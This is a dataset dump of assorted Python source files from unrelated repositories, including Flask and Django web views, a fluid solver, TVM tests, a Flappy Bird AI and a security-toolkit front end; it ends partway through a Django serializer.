metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "0xquad/attrdict",
"score": 3
} |
#### File: 0xquad/attrdict/attrdict.py
```python
__all__ = ['AttrDict', 'fromdict']
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __getattr__(self, k):
try:
return self[k]
except KeyError:
raise AttributeError(k)
def __setattr__(self, k, v):
self[k] = fromdict(v) if type(v) is dict else v
def __delattr__(self, k):
del self[k]
def walk_obj(obj, parent_obj, key):
if type(obj) is dict:
for k in obj:
walk_obj(obj[k], obj, k)
parent_obj[key] = AttrDict(obj)
elif type(obj) is list:
for i, e in enumerate(obj):
walk_obj(obj[i], obj, i)
parent_obj[key] = obj
def fromdict(d):
coll = [d]
walk_obj(coll[0], coll, 0)
return coll[0]
def fromjsonfile(fn, encoding=None):
import json
with open(fn, 'r', encoding=encoding) as f:
return fromdict(json.load(f))
``` |
{
"source": "0xquad/flask-app-template",
"score": 2
} |
#### File: flask-app-template/app.tmpl/views.py
```python
import json
from flask import Blueprint, request, url_for, jsonify, redirect, abort, current_app as app, session
from flask_genshi import Genshi, render_template
from flask_login import login_user, logout_user, login_required, current_user
from sqlalchemy import literal, text, and_, or_
from sqlalchemy.orm.exc import aliased, NoResultFound
from .models import *
app_bp = Blueprint(app.name, app.name, static_folder='static')
genshi = Genshi(app)
genshi.extensions['html'] = 'html5'
_orig_url_for = url_for
def url_for(name, *args, **kwargs):
return _orig_url_for(app.name + '.' + name, *args, **kwargs)
def render(template, **kwargs):
"""Render a Genshi template with some extra helpers."""
kwargs.update({
'static' : lambda res: url_for('static', filename=res),
'current_user' : current_user,
})
return render_template(template, kwargs)
@app_bp.route('/')
def home():
"""Display homepage"""
return render('home.html')
def validate_user_login(user_id, passwd):
profile = UserProfile.query.filter_by(email_addr=user_id).first()
validated = profile and profile.check_password(passwd)
if validated:
login_user(profile)
return validated
def check_safe_url(url):
pass
@app_bp.route('/login', methods=['GET', 'POST'])
def login():
email = None
error = None
if request.method == 'POST':
email = request.form.get('email', None)
password = request.form.get('password', None)
if validate_user_login(email, password):
# the 'next' parameter is automatically added to the URL
# when the user accesses a route with @login_required while
# not authenticated
next_url = request.args.get('next', '')
#check_safe_url(next_url)
if not next_url.startswith('/'):
next_url = None
return redirect(next_url or url_for('home'))
else:
error = 'Invalid credentials.'
return render('login.html', email=email, error=error)
@app_bp.route('/logout')
def logout():
logout_user()
return redirect(url_for('home'))
``` |
{
"source": "0xrabbyte/taichi_simple_fluid_solver",
"score": 2
} |
#### File: 0xrabbyte/taichi_simple_fluid_solver/fft_fluid_solver.py
```python
from numpy.core.fromnumeric import shape
import taichi as ti
import numpy as np
lin_iters = 20
N = 64
dt = 0.1
diff = 0.0
visc = 0.0
force = 5e5
source = 100.0
dvel = False
v = ti.Vector.field(2, float, shape=(N + 2, N + 2), offset = (-1, -1))
v_prev = ti.Vector.field(2, float, shape=(N + 2, N + 2), offset = (-1, -1))
dens = ti.field(float, shape=(N + 2, N + 2), offset = (-1, -1))
dens_prev = ti.field(float, shape=(N + 2, N + 2), offset = (-1, -1))
div = ti.field(float, shape=(N + 2, N + 2), offset = (-1, -1))
p = ti.field(float, shape=(N + 2, N + 2), offset = (-1, -1))
pixels = ti.field(float, shape=(N, N))
@ti.kernel
def add_source(a : ti.template(), b : ti.template()):
for i, j in a:
a[i, j] += dt * b[i, j]
@ti.kernel
def swap(a : ti.template(), b : ti.template()):
for i, j in a:
a[i, j], b[i, j] = b[i, j], a[i, j]
@ti.func
def set_bnd(x : ti.template()):
for i in range(N):
x[-1, i] = x[0, i]
x[N, i] = x[N - 1, i]
x[i, -1] = x[i, 0]
x[i, N] = x[i, N - 1]
x[-1, -1] = (x[0, -1] + x[-1, 0]) / 2.0
x[-1, N] = (x[0, N] + x[-1, N - 1]) / 2.0
x[N, -1] = (x[N - 1, -1] + x[N, 0]) / 2.0
x[N, N] = (x[N - 1, N] + x[N, N - 1]) / 2.0
@ti.kernel
def lin_solve(x : ti.template(), x0 : ti.template(), a : float, c : float):
for i, j in ti.ndrange(N, N):
x[i, j] = (x0[i, j] + a * (x[i - 1, j] + x[i + 1, j] + x[i, j - 1] + x[i, j + 1])) / c
set_bnd(x)
def diffuse(a, a_prev, diff):
k = dt * diff * N * N
for t in range(lin_iters):
lin_solve(a, a_prev, k, 1.0 + 4.0 * k)
@ti.kernel
def advect(d : ti.template(), d0 : ti.template(), v : ti.template() ):
dt0 = dt * N
for i, j in ti.ndrange(N, N):
x, y = i - dt0 * v[i, j][0], j - dt0 * v[i, j][1]
if (x < 0.5): x = 0.5
if (x > N + 0.5): x = N + 0.5
i0, i1 = int(x), int(x) + 1
if (y < 0.5): y = 0.5
if (y > N + 0.5): y = N + 0.5
j0, j1 = int(y), int(y) + 1
s1, s0, t1, t0 = x - i0, i1 - x, y - j0, j1 - y
d[i, j] = s0 * (t0 * d0[i0, j0] + t1 * d0[i0, j1]) + s1 * (t0 * d0[i1, j0] + t1 * d0[i1, j1])
set_bnd(d)
def fft_project(v):
u0 = np.zeros(shape = (N + 2, N))
v0 = np.zeros(shape = (N + 2, N))
for i, j in ti.ndrange(N, N):
u0[i, j], v0[i, j] = v[i, j][0], v[i, j][1]
u0 = np.fft.fft2(u0)
v0 = np.fft.fft2(v0)
for i, j in ti.ndrange(N + 2, N):
x, y = i, j
if j > N // 2 : j = j - N
r = x * x + y * y
if (r == 0.0): continue
f = ti.exp(-r*dt*visc)
U, V = u0[i,j], v0[i,j]
u0[i, j] = f * np.complex((1-x*x/r)*U.real+(-x*y/r)*V.real, (1-x*x/r)*U.imag+(-x*y/r)*V.imag)
v0[i, j] = f * np.complex((-y*x/r)*U.real+(1-y*y/r)*V.real,(-y*x/r)*U.imag+(1-y*y/r)*V.imag)
u0 = np.fft.ifft2(u0)
v0 = np.fft.ifft2(v0)
f = 1.0/(N*N)
for i, j in ti.ndrange(N, N):
v[i, j][0], v[i, j][1] = f * u0[i, j], f * v0[i, j]
print("Okay")
def dens_step():
add_source(dens, dens_prev)
swap(dens, dens_prev)
diffuse(dens, dens_prev, diff)
swap(dens, dens_prev)
advect(dens, dens_prev, v)
def vel_step():
add_source(v, v_prev)
swap(v, v_prev)
diffuse(v, v_prev, visc)
fft_project(v)
swap(v, v_prev)
advect(v, v_prev, v_prev)
fft_project(v)
``` |
{
"source": "0xRainy/raindrops-rl",
"score": 2
} |
#### File: 0xRainy/raindrops-rl/collision.py
```python
class Collision:
def __init__(self, solid):
self.solid = solid
``` |
{
"source": "0xRauros/PySAT",
"score": 2
} |
#### File: PySAT/application/app.py
```python
from flask import Flask, render_template, redirect, url_for, request
from flask_socketio import SocketIO, send, emit
from modules.anon import anon_proxy
from modules.anon.anon_proxy import CustomProxy
from modules.crypto import crypto_utilities
from modules.forensics import image_utilities
from modules.forensics.image_utilities import CustomImage
from modules.scanner import web
from modules.scanner import server_scanner
import helper
import re
import os
PATH = os.path.abspath(os.getcwd())
app = Flask(__name__)
app.config['SECRET KEY'] = 'secret!'
app.config['DEBUG'] = False
socketio = SocketIO(app)
@app.route('/')
def index():
if helper.any_proxy():
proxy = helper.get_current_proxy()
ip = proxy.ip
else:
ip = helper.get_real_ip()
proxy=None
return render_template('index.html', ip=ip, proxy=proxy)
####################################################################
##################### ANONYMOUS IP #################################
####################################################################
@app.route('/reset_ip')
def reset_ip():
helper.remove_proxy()
return redirect(url_for('index'))
@app.route('/anon')
def anon():
proxies = anon_proxy.get_proxy_list()
proxies = proxies#[:50]
return render_template('anon/anon.html', nproxies=len(proxies), proxies=proxies, cproxy=None) # cproxy -> config.txt defined proxy (customproxy)
@app.route('/anon/set_proxy/<string:ip>/<string:port>/<string:country>/<string:anonymous>', methods=['GET', 'POST'])
@app.route('/anon/set_proxy', methods=['GET', 'POST'])
def set_proxy(ip=None, port=None, country=None, anonymous=None):
if request.method == 'POST':
proxy_addr = request.form['proxyAddr']
if helper.is_ip_port(proxy_addr):
ip = proxy_addr.split(':')[0]
port = proxy_addr.split(':')[1]
proxy = CustomProxy(ip, port, 'unkwon', 'unkwon')
else:
return redirect(url_for('anon'))
else:
proxy = CustomProxy(ip, port, country, anonymous)
proxy_works = helper.test_proxy_connection(proxy)
if proxy_works:
helper.config_proxy(proxy) # init proxy.txt
return redirect(url_for('index'))
return redirect(url_for('anon'))
####################################################################
##################### NETWORKING ###################################
####################################################################
@app.route('/networking')
def networking():
return render_template('networking/networking.html')
####################################################################
##################### CRYPTOGRAPHY #################################
####################################################################
@app.route('/crypto')
def crypto():
hash_types = crypto_utilities.get_hash_types()
encodings = crypto_utilities.get_encodings()
decoders = crypto_utilities.get_decoders()
return render_template('crypto/crypto.html', hash_types=hash_types, encodings=encodings, decoders=decoders)
@socketio.on('hash identify')
def handle_hash_check(hash):
identifier = crypto_utilities.hash_identifier(hash)
if identifier:
result = ', '.join(identifier)
else:
result = 'Match not found :('
emit('hash identify', result)
@socketio.on('text to hash')
def handle_text_to_hash(text_hash):
text = text_hash.split('[flag]')[0]
type = text_hash.split('[flag]')[1]
hash = crypto_utilities.text_to_hash(text, type)
if hash is not None:
result = hash
else:
result = 'Error'
emit('text to hash', result)
@socketio.on('text to encode')
def handle_text_to_encode(text_encoder):
text = text_encoder.split('[flag]')[0]
encoder = text_encoder.split('[flag]')[1]
code = crypto_utilities.text_to_encode(text, encoder)
emit('text to encode', code)
@socketio.on('decode code')
def handle_text_to_encode(code_decoder):
code = code_decoder.split('[flag]')[0]
decoder = code_decoder.split('[flag]')[1]
text = crypto_utilities.decode_code(code, decoder)
print(text)
if text is None:
text = 'Unable to decode...'
emit('decode code', text)
####################################################################
##################### FORENSICS ####################################
####################################################################
@app.route('/forensics')
@app.route('/forensics/pdfs')
@app.route('/forensics/virus')
def forensics():
template = 'forensics/forensics.html'
if 'pdfs' in request.path:
template = 'forensics/pdfs.html'
elif 'virus' in request.path:
template = 'forensics/virus.html'
return render_template(template)
@app.route('/forensics/images')
@app.route('/forensics/images/<id>')
def forensics_images(id=None):
images_tuple = helper.get_images() # list of images (image_name, full_path)
images_name = images_tuple[0]
images_path = images_tuple[1]
images_to_exif = []
size = len(images_path)
for i in range(size):
image_to_exif = CustomImage(images_name[i], images_path[i])
if image_to_exif.exif and image_to_exif is not None:
images_to_exif.append(image_to_exif)
if id is None:
return render_template('forensics/images.html', images=images_to_exif, size=size)
image = images_to_exif[int(id)]
return render_template('forensics/image.html', image=image, id=id) # Specific image
####################################################################
##################### SCANNER ######################################
####################################################################
@app.route('/scanner')
def scanner():
return render_template('scanner/scanner.html')
####################################################################
##################### SERVER SCANNER ###############################
####################################################################
@app.route('/scanner/server')
def port_scanner():
anon = False
if helper.any_proxy():
anon = True
return render_template('scanner/servers.html', anon=anon)
@socketio.on('scan server')
def scan_server(host):
scanner_data = helper.parse_server_scanner_data(host)
if scanner_data is not None:
scan_info = server_scanner.load_port_scanner(scanner_data[1], scanner_data[2], scanner_data[3], scanner_data[4])
threads = str(scan_info['threads'])
ports_list = scan_info['ports']
time = str(scan_info['time'])
banner_list = scan_info['banner']
# port parse
ports = ''
for port in ports_list:
if ports != '':
ports += ':'+str(port)
else:
ports += str(port)
port_banner = [ports_list[i]+'[banner]'+banner_list[i] for i in range(len(ports_list))]
port_banner_data = ''
for pb in port_banner:
if port_banner_data != '':
port_banner_data += '[flag]'+str(pb)
else:
port_banner_data += str(pb)
# data sendinf via sockets
emit('time', time)
emit('threads', threads)
emit('banner', port_banner_data)
# 4 ip geolocation info and map displaying
if scanner_data[0] == 'ipgps':
lat_long = server_scanner.get_gps(scanner_data[1])
data = str(lat_long[0])+':'+str(lat_long[1])
emit('ipgps', data)
print(data)
else:
pass
else:
emit('scan server', 'Target Error: worng input format.')
####################################################################
##################### WEB SCANNER ##################################
####################################################################
@app.route('/scanner/web')
def web_scanner():
anon = False
if helper.any_proxy():
anon = True
username = helper.get_pc_user()
return render_template('scanner/web.html', username=username, anon=anon)
@socketio.on('scan web')
def scan_web(param):
params = param.split(':') # carefull with the http/s <:>
helper.load_web_scanner(params)
####################################################################
##################### HELP #########################################
####################################################################
@app.route('/help')
def help():
return render_template('help/help.html')
@app.errorhandler(404)
def page_not_found(error):
return render_template('page_not_found.html', error=error)
if __name__ == '__main__':
socketio.run(app)
``` |
{
"source": "0xReki/protonfixes",
"score": 2
} |
#### File: protonfixes/gamefixes/39210.py
```python
from protonfixes import util
import os
def main():
""" FFXIV add NOSTEAM option.
"""
# Fixes the startup process.
if 'NOSTEAM' in os.environ:
util.replace_command('-issteam', '')
# Runs XIVLauncher instead of Stock Launcher
if 'XL_WINEONLINUX' in os.environ:
util.set_environment('PROTON_SET_GAME_DRIVE', '1')
util.protontricks_proton_5('dotnet48')
util.protontricks('vcrun2019')
util.replace_command('common/FINAL FANTASY XIV Online/boot/ffxivboot.exe', 'compatdata/39210/pfx/drive_c/users/steamuser/AppData/Local/XIVLauncher/XIVLauncher.exe')
util.replace_command('-issteam', '')
``` |
{
"source": "0xRet/yeti",
"score": 3
} |
#### File: feeds/public/blocklistde_sip.py
```python
import logging
from datetime import timedelta, datetime
from core.errors import ObservableValidationError
from core.feed import Feed
from core.observables import Ip
class BlocklistdeSIP(Feed):
default_values = {
"frequency": timedelta(hours=1),
"name": "BlocklistdeSIP",
"source": "https://lists.blocklist.de/lists/sip.txt",
"description": "All IP addresses that tried to login in a SIP-, VOIP- or Asterisk-Server and are inclueded in the IPs-List from http://www.infiltrated.net/ (Twitter).",
}
def update(self):
for line in self.update_lines():
self.analyze(line)
def analyze(self, line):
ip = line.strip()
context = {"source": self.name, "date_added": datetime.utcnow()}
try:
obs = Ip.get_or_create(value=ip)
obs.add_context(context, dedup_list=["date_added"])
obs.add_source(self.name)
obs.tag("blocklistde")
obs.tag("sip")
except ObservableValidationError as e:
logging.error(e)
``` |
{
"source": "0xreza/tvm",
"score": 2
} |
#### File: python/unittest/test_target_codegen_vm_basic.py
```python
import tvm
from tvm import te
import numpy as np
def run_jit(fapi, check):
for target in ["llvm", "stackvm"]:
if not tvm.runtime.enabled(target):
continue
f = tvm.driver.build(fapi, target=target)
s = f.get_source()
check(f)
def MakeAPILegacy(stmt, name, args, num_unpacked_args, noalias):
"""Legacy adapter to create a API"""
f = tvm.tir.PrimFunc(args, stmt).with_attr(
"global_symbol", tvm.runtime.String(name))
f = f.with_attr("tir.is_entry_func", True)
if noalias:
f = f.with_attr("tir.noalias", True)
mod = tvm.IRModule.from_expr(f)
return tvm.tir.transform.MakePackedAPI()(mod)
def test_stack_vm_basic():
a = tvm.nd.array(np.zeros(10, dtype='float32'))
@tvm.register_func
def tvm_call_back_get_shape(shape0):
print(shape0)
assert shape0 == a.shape[0]
n = te.size_var('n')
Ab = tvm.tir.decl_buffer((n, ), "float32")
stmt = tvm.tir.Evaluate(tvm.tir.call_packed("tvm_call_back_get_shape", Ab.shape[0]))
fapi = tvm.testing.MakeAPILegacy(stmt, "print_shape", [Ab], 0, True)
run_jit(fapi, lambda f: f(a))
@tvm.register_func
def tvm_stack_vm_print(*x):
print(x)
def test_stack_vm_loop():
dtype = 'int64'
n = te.size_var('n')
Ab = tvm.tir.decl_buffer((n, ), dtype)
i = te.size_var('i')
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(Ab)
with ib.for_range(0, n - 1, "i") as i:
A[i + 1] = A[i] + 1
ib.emit(tvm.tir.call_packed("tvm_stack_vm_print", i))
stmt = ib.get()
fapi = tvm.testing.MakeAPILegacy(stmt, "ramp", [Ab], 0, True)
a = tvm.nd.array(np.zeros(10, dtype=dtype))
def check(f):
f(a)
np.testing.assert_equal(a.asnumpy(), np.arange(a.shape[0]))
run_jit(fapi, check)
def test_stack_vm_cond():
dtype = 'int64'
n = te.size_var('n')
Ab = tvm.tir.decl_buffer((n, ), dtype)
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(Ab)
with ib.for_range(0, n - 1, "i") as i:
with ib.if_scope(tvm.tir.EQ(i, 4)):
A[i + 1] = A[i] + 1
with ib.else_scope():
A[i + 1] = A[i] + 2
stmt = ib.get()
fapi = tvm.testing.MakeAPILegacy(stmt, "test", [Ab], 0, True)
def check(f):
a = tvm.nd.array(np.zeros(10, dtype=dtype))
f(a)
y = np.arange(a.shape[0]) * 2
y[5:] -= 1
np.testing.assert_equal(a.asnumpy(), y)
run_jit(fapi, check)
def test_vm_parallel():
dtype = 'int64'
n = te.size_var('n')
Ab = tvm.tir.decl_buffer((n, ), dtype)
i = te.size_var('i')
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(Ab)
with ib.for_range(0, n, "i", for_type="parallel") as i:
A[i] = A[i] + 1
stmt = ib.get()
fapi = tvm.testing.MakeAPILegacy(stmt, "ramp", [Ab], 0, True)
def check(f):
a = tvm.nd.array(np.zeros(10, dtype=dtype))
f(a)
np.testing.assert_equal(a.asnumpy(), np.ones(a.shape[0]))
run_jit(fapi, check)
if __name__ == "__main__":
test_vm_parallel()
test_stack_vm_loop()
test_stack_vm_basic()
test_stack_vm_cond()
```
#### File: python/unittest/test_tir_pass_inject_double_buffer.py
```python
import tvm
from tvm import te
def test_double_buffer():
dtype = 'int64'
n = 100
m = 4
tx = te.thread_axis("threadIdx.x")
ib = tvm.tir.ir_builder.create()
A = ib.pointer("float32", name="A")
C = ib.pointer("float32", name="C")
ib.scope_attr(tx, "thread_extent", 1)
with ib.for_range(0, n) as i:
B = ib.allocate("float32", m, name="B", scope="shared")
with ib.new_scope():
ib.scope_attr(B.asobject(), "double_buffer_scope", 1)
with ib.for_range(0, m) as j:
B[j] = A[i * 4 + j]
with ib.for_range(0, m) as j:
C[j] = B[j] + 1
stmt = ib.get()
stmt = tvm.tir.ir_pass.InjectDoubleBuffer(stmt, 2)
stmt = tvm.tir.ir_pass.Simplify(stmt)
assert isinstance(stmt.body.body, tvm.tir.Allocate)
assert stmt.body.body.extents[0].value == 2
mod = tvm.IRModule({
"db" : tvm.tir.PrimFunc([A.asobject(), C.asobject()], stmt)
})
f = tvm.tir.transform.ThreadSync("shared")(mod)["db"]
count = [0]
def count_sync(op):
if isinstance(op, tvm.tir.Call) and op.name == "tvm_storage_sync":
count[0] += 1
tvm.tir.ir_pass.PostOrderVisit(f.body, count_sync)
assert count[0] == 4
if __name__ == "__main__":
test_double_buffer()
``` |
{
"source": "0xRuFFy/python_Flappy-Bird",
"score": 2
} |
#### File: src/ai/generation.py
```python
from typing import List, Tuple
from pyglet.graphics import Batch, OrderedGroup
from pyglet.text import Label
from src.data_loader import Assets, JsonData
from src.scoreBoard import ScoreBoard
from src.ai.ai_bird import Ai_Bird
from src.pipe import Pipe
class infoText(Label):
def __init__(self, text, value=0, x=0, y=0, batch=None, group=None):
super().__init__(
text=f"{text}: {value}",
font_name="Arial",
font_size=15,
color=(255, 255, 255, 255),
x=x,
y=y,
anchor_x="left",
anchor_y="baseline",
batch=batch,
group=group,
)
self.info = text
def updateValue(self, value) -> None:
self.text = f"{self.info}: {value}"
class Generation:
def __init__(
self,
size: int,
bird_setup: Tuple,
pipe_setup: Tuple,
batch: Batch,
uigroup: OrderedGroup,
jData: JsonData,
assets: Assets,
) -> None:
self.birds: List[Ai_Bird] = [Ai_Bird(*bird_setup) for _ in range(size)]
self.pipes: List[Pipe] = [
Pipe(*(pipe_setup), index=0, birds=self.birds, mode="learn"),
Pipe(*(pipe_setup), index=1, birds=self.birds, mode="learn"),
]
self.pipes[1].wrapAround(self.pipes[0], force=True)
self.pipe_setup = pipe_setup
self.gen = 1
self.maxScore = 0
self.scoreBoard = ScoreBoard(assets, jData, batch, uigroup)
self.info: List[infoText] = [
infoText("Gen", value=self.gen, x=10, y=60, batch=batch, group=uigroup),
infoText("maxScore", value=self.maxScore, x=10, y=40, batch=batch, group=uigroup),
]
def update(self, dt: float = 0) -> None:
self.set_birds_input_layer()
d_count = 0
for bird in self.birds:
if bird.alive:
bird._update(dt=dt)
if bird.score >= self.scoreBoard.score:
self.scoreBoard.score = bird.score
self.scoreBoard.update()
else:
d_count += 1
if bird.visible:
bird.visible = False
if d_count == len(self.birds):
self.create_next_gen()
self.pipes[0].update(self.pipes[1], dt=dt)
self.pipes[1].update(self.pipes[0], dt=dt)
def set_birds_input_layer(self) -> None:
next_pipe: Pipe = self.get_next_pipe()
for bird in self.birds:
if bird.alive:
top = next_pipe.upper.y - bird.y - bird.height
right = next_pipe.lower.x - bird.x - bird.width
bot = bird.y - next_pipe.lower.y - next_pipe.lower.height
left = bird.x - next_pipe.lower.x - next_pipe.lower.width
bird.set_input_layer([top, bot, right, left])
def get_next_ancestor(self) -> Tuple[List[float], bool]:
best = -1
best_id: int
for i, bird in enumerate(self.birds):
bird.get_fitnes(pipe=self.get_next_pipe())
if bird.fitnes > best:
best = bird.fitnes
best_id = i
if best == -1:
raise IndexError("No Bird has a fitnes")
return (self.birds[best_id].get_gens(), self.birds[best_id].fitnes < -.1)
def create_next_gen(self) -> None:
self.gen += 1
self.info[0].updateValue(self.gen)
if self.scoreBoard.score > self.maxScore:
self.maxScore = self.scoreBoard.score
self.info[1].updateValue(self.maxScore)
self.scoreBoard.score = 0
self.scoreBoard.update()
temp = self.get_next_ancestor()
anc = temp[0]
self.birds[0]._reset(anc, copy=True)
for bird in self.birds[1:]:
bird._reset(anc, reinit=temp[1])
del self.pipes
self.pipes: List[Pipe] = [
Pipe(*(self.pipe_setup), index=0, birds=self.birds, mode="learn"),
Pipe(*(self.pipe_setup), index=1, birds=self.birds, mode="learn"),
]
self.pipes[1].wrapAround(self.pipes[0], force=True)
def get_next_pipe(self) -> Pipe:
return self.pipes[0] if self.pipes[0].positionID == 0 else self.pipes[1]
``` |
{
"source": "0xRumple/happy",
"score": 2
} |
#### File: happy/accounts/views.py
```python
import os, requests
from rest_framework import viewsets, generics
from rest_framework.generics import GenericAPIView, RetrieveUpdateAPIView
from rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly
from fun.permissions import IsOwnerOrReadOnlyUser
from rest_framework.response import Response
from rest_framework.decorators import action
from rest_framework import status
from django.shortcuts import get_object_or_404
from posts.serializers import PostSerializer
from posts.models import Post
from posts.pagination import PostsLimitOffsetPagination, PostsPageNumberPagination
from rest_framework import serializers
# from rest_framework import permissions
from allauth.account.views import PasswordResetFromKeyView as PRV
from allauth.account.utils import perform_login
from allauth.socialaccount.providers.facebook.views import FacebookOAuth2Adapter
from rest_auth.registration.views import SocialLoginView
from rest_auth.views import LogoutView as LV
from rest_auth.registration.views import VerifyEmailView as VEV
from rest_auth.models import TokenModel
from rest_auth.app_settings import create_token
from django.contrib.auth import get_user_model
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth import logout as django_logout
from django.utils.translation import ugettext_lazy as _
from django.urls import reverse_lazy
from .models import Profile, Link
from .filters import UserFilter
from django.contrib.auth.models import User
from .serializers import (UserSerializer,
UserSocialLinksSerializer,
ProfileSerializer,
ResendConfirmSerializer,
UserDetailsSerializer,
TokenSerializer)
class UserProfileView(generics.RetrieveUpdateAPIView):
serializer_class = ProfileSerializer
def get_object(self):
user = self.request.user
profile = Profile.objects.get(id=user.id)
return profile
class UserSocialLinksViewSet(generics.RetrieveUpdateAPIView):
queryset = Link.objects.all()
serializer_class = UserSocialLinksSerializer
permission_classes = (IsAuthenticated,
IsOwnerOrReadOnlyUser, )
def get_object(self):
user = self.request.user
profile = Profile.objects.get(user_id=user.id)
links = Link.objects.get(user_id=profile.id)
return links
class UserPostsView(generics.ListAPIView):
serializer_class = PostSerializer
pagination_class = PostsPageNumberPagination
def get_queryset(self):
user = self.request.user
posts = Post.objects.filter(author_id=user.id)
return posts
class UserDetailsView(RetrieveUpdateAPIView):
serializer_class = UserDetailsSerializer
permission_classes = (IsAuthenticated,)
def get_object(self):
return self.request.user
user_details_view = UserDetailsView.as_view()
class LogoutView(LV):
def logout(self, request):
try:
request.user.auth_token.delete()
except (AttributeError, ObjectDoesNotExist):
pass
django_logout(request)
return Response({"detail": _("Successfully logged out.")},
status=status.HTTP_200_OK)
logout_view = LogoutView.as_view()
class ResendConfirmView(GenericAPIView):
serializer_class = ResendConfirmSerializer
def post(self, request, *args, **kwargs):
# Create a serializer with request.data
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
# Return the success message with OK HTTP status
return Response(
{"detail": _("Confirmation e-mail has been sent.")},
status=status.HTTP_200_OK
)
resend_confirmation_view = ResendConfirmView.as_view()
class VerifyEmailView(VEV):
token_model = TokenModel
def post(self, request, *args, **kwargs):
self.serializer = self.get_serializer(data=request.data)
self.serializer.is_valid(raise_exception=True)
self.kwargs['key'] = self.serializer.validated_data['key']
confirmation = self.get_object()
confirmation.confirm(self.request)
self.login_on_confirm(confirmation)
return self.get_response()
def login_on_confirm(self, confirmation):
self.user = confirmation.email_address.user
if self.user and self.request.user.is_anonymous:
return perform_login(self.request,
self.user,
'none')
def get_response(self):
token = create_token(self.token_model, self.user, self.serializer)
serializer_class = TokenSerializer
serializer = serializer_class(instance=token,
context={'request': self.request})
return Response(serializer.data, status=status.HTTP_200_OK)
verify_email = VerifyEmailView.as_view()
class FacebookLogin(SocialLoginView):
adapter_class = FacebookOAuth2Adapter
class GetUserProfile(viewsets.ModelViewSet):
serializer_class = PostSerializer
permission_classes = (IsAuthenticatedOrReadOnly,)
queryset = User.objects.all()
pagination_class = PostsPageNumberPagination
def retrieve(self, request, username=None):
queryset = User.objects.all()
user = get_object_or_404(queryset, username=username)
serializer = UserDetailsSerializer(user, context={'request': request})
return Response(serializer.data)
@action(detail=False, methods= ["get"])
def posts(self, request, username=None):
queryset = self.filter_queryset(self.get_queryset())
user = get_object_or_404(queryset, username=username)
posts = Post.objects.filter(author_id=user.id)
page = self.paginate_queryset(posts)
if page is not None:
serializer = self.get_serializer(page, many=True, context={"request":request})
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(posts, many=True, context={"request":request})
return Response(serializer.data)
class UsersListView(viewsets.ModelViewSet):
queryset = User.objects.all()
serializer_class = UserSerializer
filterset_class = UserFilter
pagination_class = PostsPageNumberPagination
def list(self, request):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True, context={"request":request})
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True, context={"request":request})
return Response(serializer.data)
```
#### File: happy/posts/serializers.py
```python
from rest_framework import serializers
from django.core.exceptions import ValidationError
from collections import OrderedDict
from django.conf import settings
from django.utils.module_loading import import_string
from posts.pagination import CommentsPageNumberPagination, PostsPageNumberPagination
from django.db.models import Count
from django.contrib.auth.models import User
from .models import Post
from comments.models import Comment
from comments.serializers import TopCommentSerializer, CommentSerializer
class PostSerializer(serializers.ModelSerializer):
author = serializers.ReadOnlyField(source='author.username')
author_avatar = serializers.SerializerMethodField()
time_since = serializers.ReadOnlyField(source='FORMAT')
comments_count = serializers.SerializerMethodField()
likes_count = serializers.SerializerMethodField()
dislikes_count = serializers.SerializerMethodField()
top_comment = serializers.SerializerMethodField()
reaction = serializers.SerializerMethodField()
class Meta:
"""
extra_kwargs = {'likes': {'read_only': True},
'dislikes': {'read_only': True}
}
"""
model = Post
fields = ("id","author","author_avatar","time_since",
"reaction","content","likes_count","dislikes_count",
"mediafile","comments_count","top_comment")
def get_author_avatar(self, obj, size=settings.AVATAR_DEFAULT_SIZE):
for provider_path in settings.AVATAR_PROVIDERS:
provider = import_string(provider_path)
avatar_url = provider.get_avatar_url(obj.author, size)
if avatar_url:
return avatar_url
def validate(self,data):
null = None
if len(data['content']) <=0 and data['mediafile'] is null :
raise serializers.ValidationError(u'at least one field is required')
return data
def get_comments_count(self, post):
""" get the number of comments for single post """
return Comment.objects.filter(parent=post).count()
def get_top_comment(self,post):
data = Comment.objects.filter(parent=post).annotate(
like_count=Count('likes')).order_by('-like_count').first()
serializer = TopCommentSerializer(data).data
if data == None:
return None
else:
return serializer
def get_likes_count(self,post):
return post.likes_count()
def get_dislikes_count(self, post):
return post.dislikes_count()
def get_reaction(self, post):
reaction = None
request = self.context.get("request")
if request and hasattr(request, "user"):
if post.likes.filter(id=request.user.id).exists():
reaction = 'liked'
elif post.dislikes.filter(id=request.user.id).exists():
reaction = 'disliked'
return reaction
""" def to_representation(self, instance):
ret = super(PostSerializer, self).to_representation(instance)
# Here we filter the null values and creates a new dictionary
# We use OrderedDict like in original method
ret = OrderedDict(list(filter(lambda x: x[1], ret.items())))
return ret
"""
class SinglePostSerializer(serializers.ModelSerializer):
author = serializers.ReadOnlyField(source='author.username')
#likes = serializers.StringRelatedField(many=True)
author_avatar = serializers.SerializerMethodField()
time_since = serializers.ReadOnlyField(source='FORMAT')
comments_count = serializers.SerializerMethodField()
likes_count = serializers.ReadOnlyField()
dislikes_count = serializers.ReadOnlyField()
reaction = serializers.SerializerMethodField()
# comments = serializers.SerializerMethodField()
class Meta:
"""
extra_kwargs = {'likes': {'read_only': True},
'dislikes': {'read_only': True}
}
"""
model = Post
fields = ("id","author", "author_avatar","time_since","reaction",
"content","likes_count","dislikes_count",
"mediafile","comments_count")
def validate(self,data):
null = None
if len(data['content']) <=0 and data['mediafile'] is null :
raise serializers.ValidationError(u'at least one field is required')
return data
def get_author_avatar(self, obj, size=settings.AVATAR_DEFAULT_SIZE):
for provider_path in settings.AVATAR_PROVIDERS:
provider = import_string(provider_path)
avatar_url = provider.get_avatar_url(obj.author, size)
if avatar_url:
return avatar_url
def get_comments_count(self, post):
""" get the number of comments for single post """
return Comment.objects.filter(parent=post).count()
""" def get_comments(self, post):
data = Comment.objects.filter(parent=post)
paginator = CommentsPageNumberPagination()
page = paginator.paginate_queryset(data, self.context['request'])
serializer = CommentSerializer(page, many=True).data
